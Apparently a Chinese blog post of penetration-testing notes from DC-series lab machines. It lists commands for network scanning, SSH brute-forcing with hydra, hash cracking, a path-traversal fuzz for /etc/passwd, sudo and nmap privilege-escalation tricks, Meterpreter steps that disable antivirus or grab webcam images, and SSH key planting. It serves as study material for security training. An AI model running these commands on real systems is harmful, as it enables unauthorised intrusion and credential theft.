• 我的创作纪念日,记录 Day,散


    nmap -sP 192.168.37.1/24
    nmap -p 1-65535 -A 192.168.37.132
    nmap -sC -sS 192.168.37.132 -oA dancing

    jdk自带
    keytool导出ssl证书内容

    以 jens 执行 jens 中的 backups.sh 文件
    sudo -u jens /home/jens/backups.sh

    写入文件
    echo "/bin/bash" >> /home/jens/backups.sh

    下载文件
    wget http://192.168.37.128/xxxx.xx

    执行脚本
    ./44444.sh xxxxx

    脚本格式转换
    dos2unix filename

    设置所有人可以读写及执行
    chmod 777 file  (等价于  chmod u=rwx,g=rwx,o=rwx file 或  chmod a=rwx file)

    设置拥有者可读写,其他人不可读写执行
    chmod 600 file (等价于  chmod u=rw,g=---,o=--- file 或 chmod u=rw,go-rwx file )

    hydra爆破ssh
    hydra -L DC-9_usernames.txt -P DC-9_passwords.txt 192.168.37.132 ssh
    -f          爆到停
    -t          线程

    ffmpeg -i LeafsNewSong.mp3 -an -vcodec copy cover.png    提取封面

    反弹语

     
    python -c "import pty; pty.spawn('/bin/bash')" 

    cat -A 查看详情信息

    dos 格式结尾 ^M$
    unix 格式结尾 $

    nmap提权
    echo 'os.execute("/bin/bash")' > shell
    sudo nmap --script=shell

    多次访问 IP
    for x in 7469 8475 9842 22;do nc 192.168.37.132 $x;done

    ssh 用户名@192.168.37.132
    ssh -p 21046 player@47.93.122.177

    python -m SimpleHTTPServer 8080
    python -m http.server xxx

    mysql -u用户名 -p密码
    mysql -udbuser -pR0ck3t
    -u 和 -p 后面跟着的中文,不能有空格

    2> 错误输出
    /dev/null是一个特殊的设备文件,这个文件接收到的任何数据都会被丢弃。

    openssl passwd -1 -salt Pai 123456
    passwd     生成密码
    -1     MD5模式
    -salt     插入随机数


    wpscan --url http://wordy -e u
    -e     列举--enumerate
    u     所列用户名长度,默认1-10

    cewl 爬密码本
    cewl http://192.168.37.133/ > xxx.txt


    john 散列碰撞
    john --wordlist=/usr/share/john/password.lst --rules DC-8_passwd_un.txt

    sudo -l

    ls -la

    cat -A 查看脚本尾
    dos 格式结尾 ^M$,unix 格式结尾 $

    droopescan 扫 cms 版本、cms 页面用户名
    droopescan scan wordpress -u http://192.168.37.133 -e a

    wfuzz 模糊测试:
    wfuzz --hw 121(参数) -b "PHPSESSID=4jbkh83u8gdeaqrg0rng8hh6ru" -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.132/addrecord.php?FUZZ=../../../../../../../../../etc/passwd
    wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.133/index.php?FUZZ

    响应  响应行xL  响应单词数xW  响应字符xCh
    加入 --hl (隐藏具有相同的 50 行数的响应)
    同样有 --hc/hw

    VPS 公网服务器 阿里云

    curl 访问网页整理内容

    ps    查看进程
    pwd    查看当前处于目标机的那个目录
    route    查看完整网络设置
    getlwd    查看当前目录
    getpid    查看当前进程号
    getuid    查看当前权限
    sysinfo    查看系统信息
    getsystem                    自动提权
    webcam snap                    抓取摄像头的照片
    load espia; screengrab                抓取目标机的屏幕截图
    run post/windows/gather/checkvm            查看目标机是否为虚拟机
    run post/windows/manage/killav            关闭杀毒软件
    run post/windows/gather/enum_applications        查看当前应用程序
    run post/windows/gather/enum_logged_on_users        列举当前登录的用户
    run post/windows/manage/enable_rdp            启动远程桌面协议
    upload /root/45010 /tmp/45010             将攻击机的文件上传靶机

    编译脚本
    gcc xxxxx.c -o xxxxx

    暴力破解6位未知字符,加密类型为MD5的hashcat命令
    hashcat -m 0 -a 3 hashs_md5.txt ?a?a?a?a?a?a

    vardump();
    scandir()
    file_get_contents()

    使用Nmap的NSE脚本查看对方是否开启T3协议
    nmap -n -v -p 7001,7002 192.168.37.137 --script=weblogic-t3-info

    切换java版本
    update-alternatives --config java

    ssh 公钥私钥文件利用
    cp id_rsa.pub /tmp/authorized_keys
    chmod 777 /tmp/authorized_keys
    sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh


    dirb http://192.168.37.133 -X .php,.txt,.py,.zip 


     

  • 相关阅读:
    GD32(5)文件系统
    使用Java实现一个简单的贪吃蛇小游戏
    java计算机毕业设计酒店预约入住系统源码+mysql数据库+系统+lw文档+部署
    CSS常见布局方式
    ABAP VOFM定价过程的例程创建
    SAP SD模块前台操作
    外汇天眼:美国10月份核心PCE物价低于预期!初请人数下降,美联储可以大胆放缓加息
    分享个包含各省、市、区的编码数据的在线静态资源脚本
    clickhouse停止和避免mutations操作
    古琴必修律学原理,学古琴路上太重要的密码
  • 原文地址:https://blog.csdn.net/qq_62260856/article/details/127444088